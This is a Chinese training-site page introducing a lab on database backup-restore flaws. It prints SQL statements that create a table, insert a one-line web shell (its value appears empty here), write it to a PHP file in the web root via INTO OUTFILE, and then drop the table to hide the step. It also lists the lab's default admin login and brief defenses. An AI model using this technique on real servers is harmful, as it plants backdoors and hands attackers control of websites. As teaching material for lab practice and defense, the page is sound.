:root{--puock-block-not-tran:100%}

靶场科普数据库备份恢复漏洞靶场

66次阅读
没有评论

共计 635 个字符,预计需要花费 2 分钟才能阅读完成。

本文由东塔网络安全学院总结归纳

靶场介绍

数据库备份恢复漏洞靶场

今天,给大家介绍一下东塔攻防世界其中的一个靶场: 数据库备份恢复漏洞靶场

一、实验介绍

通过对数据库可以下载备份文件到本地,再给该文件添加 sql 代码上传来实现注入

如:

drop table if exists emlog_shell;// 如果存在 emlog_shell 表就把它删了;

create table emlog_shell(`cmd` longtext not null);// 重新创建一张表 emlog_shell,而且只有字段 cmd;

insert into emlog_shell values (““);// longtext 类型且不为空,并且插入字段值,构成一句话木马;

select cmd from emlog_shell into outfile /var/www/html/11112.php ;// 然后将 cmd 的值读出来 outfle 文件输出流输出到 /var/www/html/a.php

drop table if exists emlog_shell;// emlog_shell 表删了

注意事项,后台登录地址为:URL 中直接后面加入 /admin 进入后台

后台登录账号和密码 root ,123456

二、实验目的

1、了解验证码绕过的相关知识 2、了解后台地址扫描及其他相关漏洞资料 3、了解后台常用账户密码的利用方式

三、实验步骤

根据解题思路完成数据库备份漏洞的利用

四、防御方法

1. 禁止下载备份文件

2. 对上传的 sql 文件严格检测,过滤一些关键字,包括特殊字符等

正文完
 0
评论(没有评论)